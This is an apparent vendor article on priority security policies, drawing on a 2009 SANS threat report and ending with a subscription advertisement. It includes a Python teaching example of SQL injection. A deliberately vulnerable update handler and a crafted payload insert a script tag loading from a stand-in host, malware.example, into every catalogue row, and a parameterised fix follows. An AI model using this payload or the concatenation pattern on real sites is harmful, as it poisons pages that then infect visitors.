Is it possible to declare some security policies as more critical than others? When it comes to protecting sensitive data, all security policies are important to reduce the risk of loss. However, when we look at risk mitigation from the perspective of stopping the latest attacks, some security controls rise to the top.
In September 2009 the SANS Institute released the latest version of the Top Cyber Security Risks. This analysis is based on real-world data collected from thousands of organizations. One of the objectives is to help understand the most dangerous attacks and how they happen. Based on the SANS analysis, we can highlight some of the critical information security policies that every organization should have.
Desktop Configuration Management Policies
The first step in the attack against most enterprises is the exploitation of an application running on the user desktop. Common targets are Adobe Acrobat, Flash and Microsoft Office: in short, the applications that most internet users run on a regular basis. Research from the SANS report suggests that IT groups are much more adept at patching servers than desktops. This makes sense, given the large and growing number of “end user” devices that access email and the internet.
Desktop/Laptop Configuration Security Policies would clearly rise near the top of any prioritized list of security policies. This type of policy addresses controls that help create and manage a secure “footprint” on end-user machines. These involve a combination of both management and technical controls, including remote scanning and management of user desktops, as well as acceptable-use policies limiting what the user can download on their machine. It may also limit the ability for users to make changes to machine configurations, including updates to security settings. While in some cases these features can be automated by technology, it is still important to document these requirements in written policies. An effective Configuration Security Policy addresses the entire lifecycle of end-user equipment.
Internet and Email Acceptable Use
The second phase of an exploit involving a vulnerable machine is the user opening an infected document. In some cases, a user only has to visit an infected web site (see the next policy) to be exploited. However, the majority of cases still involve the distribution of infected files via email or downloads.
Internet Acceptable Use Security Policies are critical to make users aware of safe internet practices and to educate them on the types of attacks they face. Acceptable Use policies can involve a variety of controls, including limits on the types of web sites that can be visited, the time spent on web activities, restrictions on software downloads, and limits on the types of software that can be used to access internet services. For example, uncontrolled use of Peer-to-Peer (P2P) file-sharing software has led to a number of high-profile breaches of confidential information. Email Acceptable Use Policies are closely related and can be combined with Internet Acceptable Use policies to help reduce the risk of users making critical information security mistakes.
Web Server Security
Various forms of technical attacks against web servers are creating a growing network of infected web sites that can be used to distribute malicious software to users. By far the most common are variations of the SQL Injection attack against web-database applications. These attacks are particularly damaging because a legitimate web site becomes an accomplice in infecting the real business users of the site.
To help protect against these attacks, as well as against other potential data loss through the web, every organization should have a Web Site Security Policy. Based on our research, very few organizations have such a formal policy. A look at information security frameworks such as ISO 27002, HIPAA and NIST SP 800-53 reveals that web site security is not a major focus, and certainly not called out as a key control.
A related and equally critical policy would be a Secure Application Development Policy. This policy would define the controls for designing, developing and deploying secure applications. While this is already a key requirement of PCI-DSS version 1.2, the rampant growth of web application exploits indicates that secure application development must be a priority for any organization that runs a dynamic web site backed by a database.
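To make the SQL Injection risk concrete for the policy above, here is an added example (not from the SANS report or from Information Shield) of the kind of web-database flaw a Secure Application Development Policy must rule out. It uses Python's built-in sqlite3 module, a constructed three-row product catalogue, and a hypothetical "edit description" handler; the script URL `malware.example` is made up. The vulnerable handler builds SQL by string concatenation, so one crafted input terminates the string literal and comments out the WHERE clause, planting a script tag in every row the site serves to its visitors. The hardened handler binds the same input as a parameter and the SQL text never changes.

```python
import sqlite3

# Constructed sample data standing in for a product catalogue on a business web site.
PRODUCTS = [
    ("Widget", "A fine widget."),
    ("Gadget", "A handy gadget."),
    ("Gizmo", "A clever gizmo."),
]

# Hypothetical attacker input: closes the string literal, then "--" comments out
# the remainder of the statement (including the WHERE clause), so the UPDATE hits
# every row. Visitors of a site that echoes descriptions into HTML would then
# load the attacker's script from every product page. The URL is made up.
MALICIOUS_DESCRIPTION = "<script src=\"http://malware.example/m.js\"></script>' --"


def make_catalogue():
    """Create a fresh in-memory SQLite database holding the sample catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany("INSERT INTO products (name, description) VALUES (?, ?)", PRODUCTS)
    conn.commit()
    return conn


def update_description_vulnerable(conn, product_id, description):
    """Vulnerable handler: splices user input straight into the SQL text.

    Casting the id to int protects that one field, but the description is
    still interpreted as SQL. Returns the statement actually executed.
    """
    sql = (
        "UPDATE products SET description = '" + description + "'"
        " WHERE id = " + str(int(product_id))
    )
    conn.execute(sql)
    conn.commit()
    return sql


def update_description_safe(conn, product_id, description):
    """Hardened handler: the input travels as a bound parameter, never as SQL."""
    conn.execute(
        "UPDATE products SET description = ? WHERE id = ?",
        (description, int(product_id)),
    )
    conn.commit()


def descriptions(conn):
    """Return every description in id order, as the site would render them."""
    return [row[0] for row in conn.execute("SELECT description FROM products ORDER BY id")]


def rows_with_script(conn):
    """Count catalogue rows that now carry a script tag."""
    return sum(1 for d in descriptions(conn) if "<script" in d.lower())


def demo():
    """Run both handlers against fresh catalogues; return (vulnerable, safe) damage counts."""
    vuln = make_catalogue()
    update_description_vulnerable(vuln, 1, MALICIOUS_DESCRIPTION)
    safe = make_catalogue()
    update_description_safe(safe, 1, MALICIOUS_DESCRIPTION)
    return rows_with_script(vuln), rows_with_script(safe)


if __name__ == "__main__":
    v, s = demo()
    print(f"vulnerable handler: {v} of {len(PRODUCTS)} rows now serve the script")
    print(f"parameterised handler: {s} of {len(PRODUCTS)} rows now serve the script")
```

Two caveats a reviewer would add. First, the parameterised handler stops the SQL from being rewritten, but the attacker's text is still stored verbatim in the one row it was allowed to edit, so output encoding at render time is a separate control, not something parameterisation provides. Second, SQLite's Python binding only executes one statement per call; on database engines that accept stacked statements the same string-concatenation flaw lets an attacker append an entirely new statement rather than merely truncate the existing one, which is how mass injection campaigns poison a whole site in one request.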
Keeping Security Policies Up to Date
The evolving nature of these top threats points to the need for information security and data privacy policies to be updated on a periodic basis. Information Shield has developed its PolicyShield Security Policy Subscription to address this critical business need. PolicyShield subscribers will find all of the sample documents mentioned in this article as part of their standard subscription. Each quarter, we update the subscription with new policies that help you stay protected against the latest threats.